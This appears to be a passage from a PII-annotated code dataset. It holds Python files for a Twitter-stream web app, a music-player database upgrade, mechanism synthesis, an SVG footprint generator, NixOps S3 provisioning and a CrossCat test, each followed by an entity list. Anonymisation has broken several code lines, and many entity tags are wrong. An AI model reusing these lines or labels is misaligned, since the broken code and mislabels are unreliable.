# print >> sys.stderr, 'Encountered error with status code:', status_code
# return True # Don't kill the stream
# def on_timeout(self):
# print >> sys.stderr, 'Timeout...'
# return True # Don't kill the stream
# sapi = tweepy.streaming.Stream(auth, CustomStreamListener(api))
# # my keyword today is chelsea as the team just had a big win
# sapi.filter(track=[self.request.get("inputData")])
#######################################################################
## Establish/Update User Profile
# class CustomStreamListener(tweepy.StreamListener):
# def __init__(self, api):
# self.api = api
# super(tweepy.StreamListener, self).__init__()
# #setup rabbitMQ Connection
# self.connection = RabbitConnection(host='127.0.0.1', heartbeat=None, debug=True)
# self.channel = self.connection.channel()
# #set max queue size
# args = {"x-max-length": 2000}
# self.channel.queue.declare(queue='twitter_topic_feed', arguments=args)
# def on_status(self, status):
# print status.text, "\n"
# data = {}
# data['text'] = status.text
# data['created_at'] = time.mktime(status.created_at.timetuple())
# data['geo'] = status.geo
# data['source'] = status.source
# #queue the tweet
# self.channel.basic.publish(exchange='',
# routing_key='twitter_topic_feed',
# body=json.dumps(data))
# def on_error(self, status_code):
# print >> sys.stderr, 'Encountered error with status code:', status_code
# return True # Don't kill the stream
# def on_timeout(self):
# print >> sys.stderr, 'Timeout...'
# return True # Don't kill the stream
# sapi = tweepy.streaming.Stream(auth, CustomStreamListener(api))
# # my keyword today is chelsea as the team just had a big win
# sapi.filter(track=[self.request.get("inputData")])
app = webapp2.WSGIApplication( [
('/', MainPage),
('/profile', ProfilePage),
('/createProfile', CreateProfile),
('/userRegister', ProcessUser),
('/getData', DataHandler),
('/getWords', WordsHandler),
('/data', DisplayData),
('/engine', DisplayEngine),
(decorator.callback_path, decorator.callback_handler()),
(bq_decorator.callback_path, bq_decorator.callback_handler())
], debug=True)
| 15,015 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'J. Matthew Landis'], ['PERSON', 'api = tweepy'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'user.ni'], ['URL', 'users.cr'], ['URL', 'users.cr'], ['URL', 'os.sy'], ['URL', 'stream.py'], ['URL', 'self.red'], ['URL', 'user.cr'], ['URL', 'self.red'], ['URL', 'users.cr'], ['LOCATION', 'queryData).execute(http'], ['NRP', 'dict_list'], ['LOCATION', 'queryData).execute(http'], ['LOCATION', 'queryData).execute(http'], ['NRP', 'dict_list'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'profile.ht'], ['URL', 'self.red'], ['URL', 'users.cr'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'engine.ht'], ['URL', 'users.cr'], ['URL', 'engine.ht'], ['URL', 'self.red'], ['URL', 'users.cr'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'data.ht'], ['URL', 'users.cr'], ['URL', 'data.ht'], ['URL', 'self.red'], ['URL', 'users.cr'], ['PERSON', 'StreamListener'], ['PERSON', "RabbitConnection(host='127.0.0.1"], ['PERSON', 'sapi'], ['PERSON', 'Stream(auth'], ['DATE_TIME', 'today'], ['PERSON', 'StreamListener'], ['PERSON', "RabbitConnection(host='127.0.0.1"], ['PERSON', 'sapi'], ['PERSON', 'Stream(auth'], ['DATE_TIME', 'today'], ['PERSON', 'ProcessUser'], ['URL', 'https://code.google.com/apis/console"'], ['URL', "https://www.googleapis.com/auth/plus.me',"], ['URL', "https://www.googleapis.com/auth/bigquery',"], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'email.com'], ['URL', 'haigha.co'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'httplib2.Ht'], ['URL', 'auth.se'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'template.re'], ['URL', 'handler.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'index.ht'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.red'], ['URL', 'users.cr'], ['URL', 'users.ni'], ['URL', 'createProfile.ht'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'self.request.ge'], ['URL', 'self.request.ge'], ['URL', 'fname.re'], ['URL', 'lname.re'], ['URL', 'self.request.ge'], ['URL', 'user.us'], ['URL', 'word.re'], ['URL', 'self.red'], ['URL', 'self.red'], ['URL', 'webapp2.Re'], ['URL', 'decorator.ht'], ['URL', 'self.request.ge'], ['URL', 'samples.sh'], ['URL', 'service.jo'], ['URL', 'row.it'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'webapp2.Re'], ['URL', 'decorator.ht'], ['URL', 'self.request.ge'], ['URL', 'rtda.tw'], ['URL', 'service.jo'], ['URL', 'time.mk'], ['URL', 'status.cr'], ['URL', 'status.ge'], ['URL', 'status.so'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'webapp2.Re'], ['URL', 'decorator.ht'], ['URL', 'self.request.ge'], ['URL', 'rtda.tw'], ['URL', 'service.jo'], ['URL', 'row.it'], ['URL', 'tweet.ge'], ['URL', 'resp.headers.ad'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'self.red'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'user.ni'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'user.ni'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'ndb.Mo'], ['URL', 'ndb.St'], ['URL', 'ndb.St'], ['URL', 'ndb.St'], ['URL', 'ndb.St'], ['URL', 'tweepy.St'], ['URL', 'tweepy.St'], ['URL', 'self.co'], ['URL', 'self.ch'], ['URL', 'self.connection.ch'], ['URL', 'self.channel.queue.de'], ['URL', 'time.mk'], ['URL', 'status.cr'], ['URL', 'status.ge'], ['URL', 'status.so'], ['URL', 'self.channel.ba'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'tweepy.streaming.St'], ['URL', 'sapi.fi'], ['URL', 'self.request.ge'], ['URL', 'tweepy.St'], ['URL', 'tweepy.St'], ['URL', 'self.co'], ['URL', 'self.ch'], ['URL', 'self.connection.ch'], ['URL', 'self.channel.queue.de'], ['URL', 'time.mk'], ['URL', 'status.cr'], ['URL', 'status.ge'], ['URL', 'status.so'], ['URL', 'self.channel.ba'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'tweepy.streaming.St'], ['URL', 'sapi.fi'], ['URL', 'self.request.ge'], ['URL', 'webapp2.WS'], ['URL', 'decorator.ca'], ['URL', 'decorator.ca'], ['URL', 'decorator.ca'], ['URL', 'decorator.ca']] |
46 | #!/usr/bin/python
# Copyright (c) 2014-2015 Cedric Bellegarde dummy@email.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from lollypop.sqlcursor import SqlCursor
class DatabaseUpgrade:
"""
Manage database schema upgrades
"""
def __init__(self, version, db):
"""
Init object
@param version as int
@param db as Database
"""
self._version = version
self._db = db
# Here are schema upgrade, key is database version,
# value is sql request
self._UPGRADES = {
1: "update tracks set duration=CAST(duration as INTEGER);",
2: "update albums set artist_id=-2001 where artist_id=-999;"
}
"""
Return upgrade count
@return int
"""
def count(self):
return len(self._UPGRADES)
"""
Upgrade database based on version
@return new db version as int
"""
def do_db_upgrade(self):
with SqlCursor(self._db) as sql:
for i in range(self._version+1, len(self._UPGRADES)+1):
try:
sql.execute(self._UPGRADES[i])
except Exception as e:
print("Database upgrade failed: ", e)
sql.commit()
return len(self._UPGRADES)
| 1,917 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014-2015'], ['PERSON', 'Cedric Bellegarde'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'sql.com']] |
47 | # -*- coding: utf-8 -*-
"""Thread of structural synthesis."""
__author__ = "Yuan Chang"
__copyright__ = "Copyright (C) 2016-2021"
__license__ = "AGPL"
__email__ = dummy@email.com"
from typing import Sequence, Dict, List
from qtpy.QtCore import Signal
from qtpy.QtWidgets import QWidget, QTreeWidgetItem
from pyslvs.graph import (
link_synthesis,
contracted_link_synthesis,
contracted_graph,
conventional_graph,
Graph,
)
from pyslvs_ui.synthesis.thread import BaseThread
Assortment = Sequence[int]
def assortment_eval(links_expr: str) -> Assortment:
"""Return link assortment from expr."""
return tuple(int(n.split('=')[-1]) for n in links_expr.split(", "))
class LinkThread(BaseThread):
"""Link assortment synthesis thread."""
progress_update = Signal(int)
result = Signal(dict)
size_update = Signal(int)
def __init__(self, nl: int, nj: int, parent: QWidget):
super(LinkThread, self).__init__(parent)
self.nl = nl
self.nj = nj
def run(self) -> None:
"""Run and return contracted link assortment."""
try:
la_list = link_synthesis(self.nl, self.nj, lambda: self.is_stop)
except ValueError:
self.progress_update.emit(1)
self.result.emit({})
self.finished.emit()
return
self.size_update.emit(len(la_list))
assortment = {}
for i, la in enumerate(la_list):
if self.is_stop:
break
assortment[la] = contracted_link_synthesis(la, lambda: self.is_stop)
self.progress_update.emit(1 + i)
self.result.emit(assortment)
self.finished.emit()
class GraphThread(BaseThread):
"""Graphs enumeration thread."""
progress_update = Signal(int)
count_update = Signal(QTreeWidgetItem, int)
result = Signal(list)
def __init__(self, jobs: Sequence[QTreeWidgetItem], degenerate: int, parent: QWidget):
super(GraphThread, self).__init__(parent)
self.jobs = jobs
self.degenerate = degenerate
def run(self) -> None:
"""Run and return conventional graph."""
cg_list: Dict[Sequence[int], List[Graph]] = {}
answers = []
for i, item in enumerate(self.jobs):
if self.is_stop:
break
root = item.parent()
la = assortment_eval(root.text(0))
cla = assortment_eval(item.text(0))
if la not in cg_list:
cg_list[la] = contracted_graph(la, lambda: self.is_stop)
answer = conventional_graph(
cg_list[la],
cla,
self.degenerate,
lambda: self.is_stop
)
self.count_update.emit(item, len(answer))
answers.extend(answer)
self.progress_update.emit(1 + i)
self.result.emit(answers)
self.finished.emit()
| 2,931 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Yuan Chang'], ['DATE_TIME', '2016-2021'], ['PERSON', 'QtCore'], ['URL', 'self.nl'], ['URL', 'self.nl'], ['URL', 'self.is'], ['URL', 'self.is'], ['URL', 'self.pro'], ['PERSON', 'Sequence[QTreeWidgetItem'], ['URL', 'email.com'], ['URL', 'pyslvs.gr'], ['URL', 'ui.synthesis.th'], ['URL', 'self.pro'], ['URL', 'self.re'], ['URL', 'self.fi'], ['URL', 'self.si'], ['URL', 'self.is'], ['URL', 'self.re'], ['URL', 'self.fi'], ['URL', 'self.jo'], ['URL', 'self.de'], ['URL', 'self.jo'], ['URL', 'self.is'], ['URL', 'item.pa'], ['URL', 'self.is'], ['URL', 'self.de'], ['URL', 'self.is'], ['URL', 'self.co'], ['URL', 'self.pro'], ['URL', 'self.re'], ['URL', 'self.fi']] |
48 | #!/usr/bin/env python3
import xml.etree.ElementTree as ET
def get_target():
return SVG()
class SVG:
def __init__(self):
self.svg = ET.parse('skeleton.svg')
self.mmpx = 3.543307
def output(self, path):
self.svg.write(path)
def add_package(self, package):
'''
Target SVG only handles one drawing at a time, only last added drawing will be part of output
'''
self.svg = ET.parse('skeleton.svg')
self.package = \
{
'name': package['name'],
'pads': [],
'mnt_pads': [],
'holes': [],
'lines': [],
'circles': [],
'rectangles': [] ,
'texts': []
}
def output(self, fout):
package = self.package
for pad in package['pads']:
self.gen_pac_pad(pad)
for mnt_pad in package['mnt_pads']: # TODO, adding mnt_pads not done
self.gen_pac_mnt_pad(mnt_pad)
for hole in package['holes']:
self.gen_pac_hole(hole)
for line in package['lines']:
self.gen_pac_line(line)
if(0):
for circle in package['circles']:
self.gen_pac_circle(circle)
for rect in package['rectangles']:
self.gen_pac_rectangle(rect)
for text in package['texts']:
self.gen_pac_text(text)
self.svg.write(fout)
def add_pac_pad(self, type, angle, size, pos, number):
self.package['pads'].append(
{
'type': type,
'angle': angle,
'size': size,
'pos': pos,
'number': number
})
def add_pac_hole(self, diameter, pos):
self.package['holes'].append(
{
'd': diameter,
'pos': pos
})
def add_pac_line(self, layer, width, vertices):
self.package['lines'].append(
{
'layer': layer,
'width': width,
'vertices': vertices
})
def gen_pac_pad(self, pad): # type, angle, size, pos, number
top_layer = self.svg.find('.//g[@id="Top"]')
# TODO: Types and angle
el = ET.SubElement(top_layer, 'rect')
el.set('style', 'fill:#ff0000;fill-opacity:1;stroke:none;stroke-width:10;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1')
el.set('id', 'pin_{}'.format(pad['number']))
el.set('width', '{}'.format(pad['size'][0]*self.mmpx))
el.set('height', '{}'.format(pad['size'][1]*self.mmpx))
el.set('x', '{}'.format((pad['pos'][0] - pad['size'][0]/2)*self.mmpx))
el.set('y', '{}'.format((pad['pos'][1] - pad['size'][1]/2)*self.mmpx))
def gen_pac_hole(self, hole):
top_layer = self.svg.find('.//g[@id="Holes"]')
circle = ET.SubElement(top_layer, 'circle')
circle.set('style', 'fill:#eeee00;fill-opacity:1;stroke:none;stroke-width:0.0;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1"')
circle.set('cx', '{}'.format(hole['pos'][0]*self.mmpx))
circle.set('cy', '{}'.format(hole['pos'][1]*self.mmpx))
circle.set('r', '{}'.format(hole['d']/2*self.mmpx))
def gen_pac_line(self, line):
layer = self.svg.find(dummy@email.com(line['layer']))
if(line['layer'] == 'Courtyard'):
color = '#e63a81'
elif(line['layer'] == 'Silk'):
color = '#111111'
else:
color = '#000000'
el = ET.SubElement(layer, 'path')
el.set('style', 'fill:none;fill-rule:evenodd;stroke:{color};stroke-width:{}mm;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;stroke-miterlimit:4;stroke-dasharray:none'.format(line['width'], color=color))
pathdata = ''
first = True
for (x,y) in line['vertices']:
if(first):
pathdata += 'M ' + '{},{}'.format(x*self.mmpx,y*self.mmpx)
first = False
elif(x == 'end'):
pathdata += ' z'
else:
pathdata += ' L ' + '{},{}'.format(x*self.mmpx,y*self.mmpx)
el.set('d', pathdata)
def gen_circle(self, layer_name, diameter, pos):
layer = self.svg.find(dummy@email.com(layer_name))
if(layer_name == 'Courtyard'):
color = '#e63a81'
elif(layer_name == 'Silk'):
color = '#111111'
else:
color = '#000000'
circle = ET.SubElement(layer, 'circle')
circle.set('style', 'fill:#{color};fill-opacity:1;stroke:none;stroke-width:0.0;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1"'.format(color=color))
circle.set('cx', '{}'.format(pos[0]*self.mmpx))
circle.set('cy', '{}'.format(pos[1]*self.mmpx))
circle.set('r', '{}'.format(diameter/2*self.mmpx))
if(__name__ == '__main__'):
target = get_target()
target.output('test.svg')
| 4,250 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'fout'], ['LOCATION', "package['holes"], ['PERSON', 'pos\n\t\t\t}'], ['PERSON', 'top_layer = self.svg.find(\'.//g[@id="Top'], ['PERSON', 'TODO'], ['PERSON', "el.set('style"], ['PERSON', "el.set('height"], ['PERSON', "circle.set('cx"], ['PERSON', "circle.set('r"], ['LOCATION', '000000'], ['PERSON', "el.set('style"], ['NRP', '000000'], ['PERSON', "circle.set('cx"], ['PERSON', "circle.set('r"], ['URL', 'xml.et'], ['URL', 'self.sv'], ['URL', 'ET.pa'], ['URL', 'skeleton.sv'], ['URL', 'self.mm'], ['URL', 'self.sv'], ['URL', 'self.sv'], ['URL', 'ET.pa'], ['URL', 'skeleton.sv'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.sv'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'self.svg.fi'], ['URL', 'ET.Su'], ['URL', 'el.se'], ['URL', 'el.se'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'self.svg.fi'], ['URL', 'ET.Su'], ['URL', 'circle.se'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'self.svg.fi'], ['URL', 'email.com'], ['URL', 'ET.Su'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'self.mm'], ['URL', 'self.mm'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.svg.fi'], ['URL', 'email.com'], ['URL', 'ET.Su'], ['URL', 'circle.se'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'test.sv']] |
49 | # -*- coding: utf-8 -*-
# Automatic provisioning of AWS S3 buckets.
import time
import botocore
import boto3
import nixops.util
import nixops.resources
import nixops.ec2_utils
class S3BucketDefinition(nixops.resources.ResourceDefinition):
"""Definition of an S3 bucket."""
@classmethod
def get_type(cls):
return "s3-bucket"
@classmethod
def get_resource_type(cls):
return "s3Buckets"
def __init__(self, xml, config={}):
nixops.resources.ResourceDefinition.__init__(self, xml, config)
self.bucket_name = xml.find(dummy@email.com("value")
self.region = xml.find(dummy@email.com("value")
self.access_key_id = xml.find(dummy@email.com("value")
self.policy = xml.find(dummy@email.com("value")
self.website_enabled = self.config["website"]["enabled"]
self.website_suffix = self.config["website"]["suffix"]
self.website_error_document = self.config["website"]["errorDocument"]
def show_type(self):
return "{0} [{1}]".format(self.get_type(), self.region)
class S3BucketState(nixops.resources.ResourceState):
"""State of an S3 bucket."""
state = nixops.util.attr_property("state", nixops.resources.ResourceState.MISSING, int)
bucket_name = nixops.util.attr_property("ec2.bucketName", None)
access_key_id = nixops.util.attr_property("ec2.accessKeyId", None)
region = nixops.util.attr_property("ec2.region", None)
@classmethod
def get_type(cls):
return "s3-bucket"
def __init__(self, depl, name, id):
nixops.resources.ResourceState.__init__(self, depl, name, id)
self._conn = None
def show_type(self):
s = super(S3BucketState, self).show_type()
if self.region: s = "{0} [{1}]".format(s, self.region)
return s
@property
def resource_id(self):
return self.bucket_name
def get_definition_prefix(self):
return "resources.s3Buckets."
def connect(self):
if self._conn: return
(access_key_id, secret_access_key) = nixops.ec2_utils.fetch_aws_secret_key(self.access_key_id)
self._conn = boto3.session.Session(region_name=self.region if self.region != "US" else "us-east-1",
aws_access_key_id=access_key_id,
aws_secret_access_key=secret_access_key)
def create(self, defn, check, allow_reboot, allow_recreate):
self.access_key_id = defn.access_key_id or nixops.ec2_utils.get_access_key_id()
if not self.access_key_id:
raise Exception("please set ‘accessKeyId’, $EC2_ACCESS_KEY or $AWS_ACCESS_KEY_ID")
if len(defn.bucket_name) > 63:
raise Exception("bucket name ‘{0}’ is longer than 63 characters.".format(defn.bucket_name))
self.connect()
s3client = self._conn.client('s3')
if check or self.state != self.UP:
self.log("creating S3 bucket ‘{0}’...".format(defn.bucket_name))
try:
ACL = 'private' # ..or: public-read, public-read-write, authenticated-read
s3loc = region_to_s3_location(defn.region)
if s3loc == "US":
s3client.create_bucket(ACL = ACL,
Bucket = defn.bucket_name)
else:
s3client.create_bucket(ACL = ACL,
Bucket = defn.bucket_name,
CreateBucketConfiguration = {
'LocationConstraint': s3loc
})
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != "BucketAlreadyOwnedByYou": raise
with self.depl._db:
self.state = self.UP
self.bucket_name = defn.bucket_name
self.region = defn.region
if defn.policy:
self.log("setting S3 bucket policy on ‘{0}’...".format(defn.bucket_name))
s3client.put_bucket_policy(Bucket = defn.bucket_name,
Policy = defn.policy.strip())
else:
try:
s3client.delete_bucket_policy(Bucket = defn.bucket_name)
except botocore.exceptions.ClientError as e:
# This seems not to happen - despite docs indicating it should:
# [http://docs.aws.amazon.com/AmazonS3/latest/API/RESTBucketDELETEpolicy.html]
if e.response['ResponseMetadata']['HTTPStatusCode'] != 204: raise # (204 : Bucket didn't have any policy to delete)
if not defn.website_enabled:
try:
s3client.delete_bucket_website(Bucket = defn.bucket_name)
except botocore.exceptions.ClientError as e:
if e.response['ResponseMetadata']['HTTPStatusCode'] != 204: raise
else:
website_config = { 'IndexDocument': { 'Suffix': defn.website_suffix } }
if defn.website_error_document != "":
website_config['ErrorDocument'] = { 'Key': defn.website_error_document}
s3client.put_bucket_website(Bucket = defn.bucket_name, WebsiteConfiguration = website_config)
def destroy(self, wipe=False):
if self.state == self.UP:
self.connect()
try:
self.log("destroying S3 bucket ‘{0}’...".format(self.bucket_name))
bucket = self._conn.resource('s3').Bucket(self.bucket_name)
try:
bucket.delete()
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != "BucketNotEmpty": raise
if not self.depl.logger.confirm("are you sure you want to destroy S3 bucket ‘{0}’?".format(self.bucket_name)): return False
bucket.objects.all().delete()
bucket.delete()
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != "NoSuchBucket": raise
return True
def region_to_s3_location(region):
# S3 location names are identical to EC2 regions, except for
# us-east-1 and eu-west-1.
if region == "eu-west-1": return "EU"
elif region == "us-east-1": return "US"
else: return region
| 6,394 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['NRP', 'S3'], ['LOCATION', 'config='], ['PERSON', 'self.access_key_id = xml.find(dummy@email.com("value'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.co'], ['LOCATION', 'US'], ['LOCATION', 'defn'], ['LOCATION', 'US'], ['URL', 's3client.de'], ['URL', 'botocore.exceptions.Cl'], ['LOCATION', 'US'], ['US_DRIVER_LICENSE', 'S3'], ['URL', 'http://docs.aws.amazon.com/AmazonS3/latest/API/RESTBucketDELETEpolicy.html]'], ['URL', 'nixops.re'], ['URL', 'nixops.ec'], ['URL', 'nixops.resources.Re'], ['URL', 'nixops.resources.Re'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'self.re'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'self.ac'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'self.ge'], ['URL', 'self.re'], ['URL', 'nixops.resources.Re'], ['URL', 'nixops.util.at'], ['URL', 'nixops.resources.Re'], ['URL', 'nixops.util.at'], ['URL', 'nixops.util.at'], ['URL', 'ec2.ac'], ['URL', 'nixops.util.at'], ['URL', 'ec2.re'], ['URL', 'nixops.resources.Re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'nixops.ec'], ['URL', 'self.ac'], ['URL', 'boto3.session.Se'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.ac'], ['URL', 'defn.ac'], ['URL', 'nixops.ec'], ['URL', 'utils.ge'], ['URL', 'self.ac'], ['URL', 'self.co'], ['URL', 'conn.cl'], ['URL', 'self.st'], ['URL', 'defn.re'], ['URL', 's3client.cr'], ['URL', 's3client.cr'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re'], ['URL', 'self.de'], ['URL', 'self.st'], ['URL', 'self.re'], ['URL', 'defn.re'], ['URL', 'defn.policy.st'], ['URL', 's3client.de'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re'], ['URL', 'e.re'], ['URL', 'self.st'], ['URL', 'self.co'], ['URL', 'conn.re'], ['URL', 'bucket.de'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re'], ['URL', 'self.depl.logger.co'], ['URL', 'bucket.objects.al'], ['URL', 'bucket.de'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re']] |
50 | #
# Copyright (c) 2010-2014, MIT Probabilistic Computing Project
#
# Lead Developers: Dan Lovell and Jay Baxter
# Authors: Dan Lovell, Baxter Eaves, Jay Baxter, Vikash Mansinghka
# Research Leads: Vikash Mansinghka, Patrick Shafto
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import sys
from collections import Counter
#
import numpy
import pylab
pylab.ion()
pylab.show()
#
import crosscat.tests.plot_utils as pu
import crosscat.utils.file_utils as fu
import crosscat.utils.sample_utils as su
import crosscat.utils.api_utils as au
# parse some arguments
parser = argparse.ArgumentParser()
parser.add_argument('pkl_name', type=str)
parser.add_argument('--inf_seed', default=0, type=int)
parser.add_argument('--hostname', default='127.0.0.1', type=str)
args = parser.parse_args()
pkl_name = args.pkl_name
inf_seed = args.inf_seed
hostname = args.hostname
# FIXME: getting weird error on conversion to int: too large from inside pyx
def get_next_seed(max_val=32767): # sys.maxint):
return random_state.randint(max_val)
# resume from saved name
save_dict = fu.unpickle(pkl_name)
random_state = numpy.random.RandomState(inf_seed)
M_c = save_dict['M_c']
X_L = save_dict['X_L']
X_D = save_dict['X_D']
# FIXME: test constraints
# Y = [su.Bunch(index=2,value=2.3), su.Bunch(index=0,value=-4.)]
Y = None
# test simple_predictive_sample_observed
views_replicating_samples_params = su.determine_replicating_samples_params(X_L, X_D)
views_samples = []
for replicating_samples_params in views_replicating_samples_params:
this_view_samples = []
for replicating_sample_params in replicating_samples_params:
this_view_this_sample = su.simple_predictive_sample(
M_c, X_L, X_D, get_next_seed=get_next_seed, **replicating_sample_params)
this_view_samples.extend(this_view_this_sample)
views_samples.append(this_view_samples)
for view_idx, view_samples in enumerate(views_samples):
data_array = numpy.array(view_samples)
pu.plot_T(data_array)
pylab.title('simple_predictive_sample observed, view %s on local' % view_idx)
# test simple_predictive_sample_observed REMOTE
# hostname = 'ec2-23-22-208-4.compute-1.amazonaws.com'
URI = 'http://' + hostname + ':8007'
method_name = 'simple_predictive_sample'
#
views_samples = []
for replicating_samples_params in views_replicating_samples_params:
this_view_samples = []
for replicating_sample_params in replicating_samples_params:
args_dict = dict(
M_c=save_dict['M_c'],
X_L=save_dict['X_L'],
X_D=save_dict['X_D'],
Y=replicating_sample_params['Y'],
Q=replicating_sample_params['Q'],
n=replicating_sample_params['n'],
)
this_view_this_sample, id = au.call(
method_name, args_dict, URI)
print id
this_view_samples.extend(this_view_this_sample)
views_samples.append(this_view_samples)
for view_idx, view_samples in enumerate(views_samples):
data_array = numpy.array(view_samples)
pu.plot_T(data_array)
pylab.title('simple_predictive_sample observed, view %s on remote' % view_idx)
# test simple_predictive_sample_unobserved
observed_Q = views_replicating_samples_params[0][0]['Q']
Q = [(int(1E6), old_tuple[1]) for old_tuple in observed_Q]
new_row_samples = []
new_row_sample = su.simple_predictive_sample(
M_c, X_L, X_D, Y, Q, get_next_seed, n=1000)
new_row_samples.extend(new_row_sample)
new_row_samples = numpy.array(new_row_samples)
pu.plot_T(new_row_samples)
# once more with constraint
Y = [(int(1E6), 0, 100)]
new_row_sample = su.simple_predictive_sample(
M_c, X_L, X_D, Y, Q, get_next_seed, n=1)
# test impute
# imputed_value = su.impute(M_c, X_L, X_D, Y, [Q[3]], 100, get_next_seed)
| 4,283 | [['DATE_TIME', '2010-2014'], ['PERSON', 'Dan Lovell'], ['PERSON', 'Jay Baxter'], ['PERSON', 'Dan Lovell'], ['PERSON', 'Baxter Eaves'], ['PERSON', 'Jay Baxter'], ['PERSON', 'Vikash Mansinghka'], ['PERSON', 'Patrick Shafto'], ['LOCATION', 'crosscat.utils.sample_utils'], ['LOCATION', 'au'], ['PERSON', "default='127.0.0.1"], ['PERSON', 'save_dict = fu.unpickle(pkl_name'], ['LOCATION', 'M_c'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['PERSON', 'new_row_samples'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'pylab.io'], ['URL', 'pylab.sh'], ['URL', 'crosscat.tests.pl'], ['URL', 'crosscat.utils.fi'], ['URL', 'crosscat.utils.sa'], ['URL', 'argparse.Ar'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['URL', 'args.pk'], ['URL', 'args.in'], ['URL', 'sys.ma'], ['URL', 'su.de'], ['URL', 'su.si'], ['URL', 'numpy.ar'], ['URL', 'pu.pl'], ['URL', 'ec2-23-22-208-4.compute-1.amazonaws.com'], ['URL', 'au.ca'], ['URL', 